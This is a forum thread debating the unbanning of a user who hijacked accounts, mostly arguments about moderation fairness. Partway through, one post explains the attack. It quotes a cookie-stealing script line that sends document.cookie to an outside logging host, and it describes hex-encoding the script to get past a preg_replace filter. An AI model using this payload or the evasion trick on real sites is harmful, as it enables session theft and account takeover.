A security hole was used to run the script, that sounds like he exploited it.Zitat:
Zitat von EvilSeph
Printable View
A security hole was used to run the script, that sounds like he exploited it.Zitat:
Zitat von EvilSeph
Thankyou Evilseph for your analysis. Clearly I was wrong and I should have probably left it to someone more knowledgable than me to post a thread regarding the recent issues.Zitat:
Zitat von EvilSeph
Just so this discussion ends, I tell you exactly how the exploit worked.
A link to a picture was posted on QJ. This picture did not exist, the .htaccess file was modified to redirect to myQJ when you clicked the file.
This would take you to MyQJ and it would put javascript in the search box and search it. The javascript was:
Where whiteacid is a site for anonymous cookie stealing.Code:<script>location.href="http://*******************/log.php?893801"+document.cookie</script>
Now usually the php function preg_replace would get rid of any scripts, however the script was written in hex characters, so preg replace would not actually work.
The result would be that your cookie will be sent to that site and TMM could use it. A person who clicked the link would come up with an error, be redirected to myqj and get more errors there.
I don't think the admins will mind me posting this as they have expert security advice now so this kind of stuff wont work anymore.
Evilseph, If there is anything I have misunderstood, please correct me. I am still learning and I don't want to give out false information.
the only thing is that none of the staff were told of this beforehand
this thing made me laugh out hard.
My apologies. I formatted my post wrong.Zitat:
Zitat von Gutya
I meant, you are wrong, with regards to: " The security hole was in MyQJ."
It wasn't. It affects any script/"software" that uses cookies. Any cookie can be stolen, the fact it happened on myQJ is irrelevant. It could have been used on these forums.
The "it's not really an exploit" part was a whole other indirectly related point.
@PopeOfDope, your analysis is close enough. There is more than one way to use the "security hole" though.
Okay i just read most of this thread.
I'll give my opinion.
I'm not annoyed by Mysticales decision to unban milkman.
BUT I have to say, whenever you ban someone now you know there is going to be complete uproar.
The users of this forum will always hold this against you. And why not?
I'm going to use a previous ban of my own in example to this.
I got banned for a month for having this as my sig:
'You have banned for the following reason:
"take you **** our the umd tray" is not a valid post'
Baisacally it was a printscreen of my previous ban.
Now what my ban has in common with TMM hacking is that they both disrespected the Site and it's authority.
I got banned for a month. But TMM gets welcomed with open arms.
Now I'm not holding a grudge against QJ but I'm just saying your quick justice policy needs looking at some more.
I also agree with what others have said. I think your scared TMM is going to hack the site again, therefore giving him a place on these forums will make him stop. Well he has got what he wanted.
But I think you will regret this in the long run.
Thankyou, and good day :)
I have to say SeanyP just pwned this thread and situation.
End of.
I think people are over analyzing this way too much! Give it a month, everything will be back to normal and people will have forgotten.
When the MD closed people were "going mad" (as mad as you get on the net), they said the same kinda things as they are saying here.
When TMK was banned everyone went up in arms but again everyone forgot and when he was unbanned everyone was kinda like: "Huh, he's back". That actually brings up a good point TMK was permabanned and came back, he is far better than he was.
Just give this time to blow over. ;)
PopeOfDope's analysis is correct.
What I meant is, he used a vulnrebility in MyQJ, it may be in the CMS in such a way that it appears on the front page of each blog, but that would be impossible for me to tell without inside knowledge or access to the underlying code. I just said MyQJ because that is where the rewrite rules on MY server pointed in order to run the cookie stealer. It is obvious that somewhere on the page, data collected from a GET var is echoed.Zitat:
Zitat von EvilSeph
Agreed.Zitat:
Zitat von Chathurga
You clearly have no clue what you're talking about.Zitat:
Zitat von Gutya
He did not use a vulnerability in MyQJ.
The little trick he used (I refuse to call it an exploit anymore), allows him to specify what url the user will be redirected to AFTER the cookie copying is done. That url could have been ANY site. The fact MyQJ was specified is IRRELEVANT.
I think you're overlooking the fact NeilR has decided to possibly retire due to this.Zitat:
Zitat von Chathurga
Okay then, humor me. How DID he run the code?Zitat:
Zitat von EvilSeph
I am not trying to be a prick, but you are wrong. I'm not trying to be an 'internet *******' but I know the EXACT method he used.Zitat:
Zitat von EvilSeph
Im glad I got a good amount of feedback on my views about this :dry:
He DIDN'T run any code on MyQJ. NO EXPLOIT WAS USED. He simply had people click a link that lead to a non-existant file, that redirected the user to the cookie stealing script (of which he probably has no idea how it works) and THAT did all the work.Zitat:
Zitat von Gutya
No malicious code was injected anywhere. No exploit was used. No vulnerability was used.
Alot of staff members have said this from time to time, none have actually gone through with it.Zitat:
Zitat von EvilSeph
The only vulnerability here is peoples' failure to be alert.
Stop acting like a five year old on a diving board telling people to look at him for attention and praise. If you aren't going to stay on topic here, you will be banned from the thread, as most other off topic posters have already been.Zitat:
Zitat von SeanyP
Zitat:
Zitat von EvilSeph
I'm sorry, but you don't really know what you are talking about in this case. I am not trying to flame you, emotions are hard to display over a forum, I mean this in the nicest way possible.
If you have MSN, I can talk to you about how he actually did it, as you seem to be someone who knows their stuff, I'd just rather not post it here.
So you trying to tell me I had NO valid points in my other post?Zitat:
Zitat von Abe_Froeman
You had some valid, albeit repeated points in your post. You don't need someone quoting you and saying 'zomg best post ever' all the time. Asking for complements is even worse.Zitat:
Zitat von SeanyP
Just be happy that you contributed to a discussing in what little way you can and now your thoughts are being read by a lot more people.
Um yea looking at the info myself nothing was injected nor exploited at all. The only thing that qj.net or myqj was, was a target site. All was done was a kiddiescript linked to whiteacid to get the cookie to use it as the session key nothing more nothing less. Pretty much the method of what Pope mentioned was correct. AS there was no real injection. Any site could have been targeted go google whiteacid and the site tells you how it does it.Zitat:
Zitat von Gutya
wow thanks for hacking my account
Edit:
Nothing happened.
What the hell, Milkman was banned, Period. WTF is wrong with you guys, if someone is banned they are banned, especially if they hacked the forum. Who gives a **** about an apology? I am sorry but if everyone could just be un-banned by 'helping' out with something then anyone banned could be un-banned. FFS man.
i seriously agree, if this is the case Xandu should be unbanned. (not that i want him to) but to make it fairZitat:
Zitat von TheEx
wow way to give some other random wannabe hacker the means to go hack some random site then think there hardcore or "1337" i think the point thats to be gotten is that alot of ppl are pissed of that this guy is back because he made a place that alot of us like to view as safe unsafe
I get that and I agree a part of it but seriously, un-banning someone is just stupid...
he broke the rules, simple as, when someone breaks a real they get bannedZitat:
Zitat von -Xin-
yea i under stand that its like if i went out on the street and stold drugs to a cop i whould go to jail they whouldn't say will atlest you didn't sell them to a kid and let me go
Unlike many people that have posted, I'm not here to get banned for calling the staff "gay", "retards", or "Insolent pricks" (In any form of wording). I am here to say that the rules here need revising. If someone were to use a weird wording that may have inulted someone and gets banned for over 3 weeks, ffs, why the hell would a hacker, proving a legit point or not, BEFORE notifying ANYONE, be unbanned? This is ****ing insanity! Plus, on top of that, you give the point that TMM did a SMALL hack. Um... Did you by any chance forget Xandu? He did ONE small thing, and gets perma-banned. TMM does several "small" things (that got 1/15 of all QJ member's sigs jacked up or banned) and you decide to give him a second chance? See why that doesnt measure up? Not to start a conspiracy but, I may temp ban myself for a couple weeks/days so that this gets out of my mind.
My point is, qj's qjp is HORRIBLE. All rules need revising from time to time. The fact that I haven't seen anyone from teh staff telling ANYONE that the staff is looking over it to see what needs changing disturbs me. So e-mail me when that happens because as of now, i am really pissed and probably will leave this whole website and not return until I am told that the rules here have changed for the better.
No offense to the staff, but could that be arranged?
Ok whatever, lets not go offtopic.
@King_kong: so right.
When a revision to any policy happens, it will be noted/bumped in whatever thread is getting revised. To say they are being revised currently would be a lie, but I see some happening in the near future since they are pretty much needed at the moment.
I may spearhead this effort or I may not, that's still to be determined and discussed backstage. Once something worth reporting is necessary, it will be made public.
Xandu was banned, not for doing this one small thing, but for lying about it and hiding it. Get your facts straight before you go off on a hissy fit.Zitat:
Zitat von King_Kong1985
Thank you, and thespiral, stfu.Zitat:
Zitat von Abe_Froeman
i agree with king kong
Let me inject my worthless 2 cents into this thread. Ive read this whole thread during the course of today and I must say I agree 100% with the evil... guy(dont remeber the last part).
I fail to understand why the heck milkman is unbanned. He caused trouble and hacked into memebers accounts, mostly mods accounts at that. He moved threads, changed posts, and got some users banned. Now thats all fine and dandythe first time i guess and i could see a second chance but he did this to so many peoples accounts its not right to give him another chance. Of course he said he has changed. He desperatly wanted to be back here as evident by his hacking and you let him back after all that. People here have said he deserves another chance, hes changed etc. Those that have said that need a reality check big time. He didnt change any from last night, he is still the same person as he was.
I dont fault the milkman at all. if anything I applaud(?sp) him on doing what he set out to do. he cause the forums trouble and got what he wanted and that was to be back. If only society worked where rule breakers could be allowed back and their demands giving into. I dont know what message myst is trying to send but if anything my view of her drop drastically. Our site admin is weak and gave in due to a problem. She should have reported him to the powers that be and got him in serious trouble. Letting him back doesnt solve a thing it only weakens the users view on the admin. I am sorry myst but imo you made a big mistake. Not unbanning him really but showing you made a stand and allowed a user to be perma banned then you let them back even though they caused you alot of stress. You truly our are fearless leader. Lets just be glad you dont run the courts.
<3 to the milkman. He did what he set out to do and he made the forums and its staff into a joke. (not all the staff)
I also anticipate some saying it aint all mysts fault etc. I will say this upfront it isnt soley her fault but when you run something you are accountable. She runs the forum and does some great things, but imo she is at fault here
Some of you are way too protective over these forums. You are treating them like you bluddy children.
TBH if he is helping Myst patch all the security issues get the **** over it, he is god damn helping and making the forums more safe. FOR YOU TO USE, if he dunt help a more dangerous hacker team aka alysis (or sommat along them lines) is going to come and delete the bloody forums. And trust me they would they have hacked everytype of forum board and they are total pricks.
I somewhat agree with you, but i certainly dont appluad him.Zitat:
Zitat von DMX
Let's put it this way. You leave your car door open and I see it. I can do 2 things:Zitat:
Zitat von JIBBS
1) Steal your car and tell you later that I did it and you shouldn't leave your car door open. In the process of stealing your car I killed 10 people.
2) I could tell you your car door is open so that you can close it yourself.
Now obviously account hijacking is not as bad as killing people, but to assume that the only way to warn someone of their fault is by exploiting it is stupid.
I dont appluad his actions of hacking, i appluad him doing something most people would have loved to do and that is make a higher authority submit basicallyZitat:
Zitat von C-Money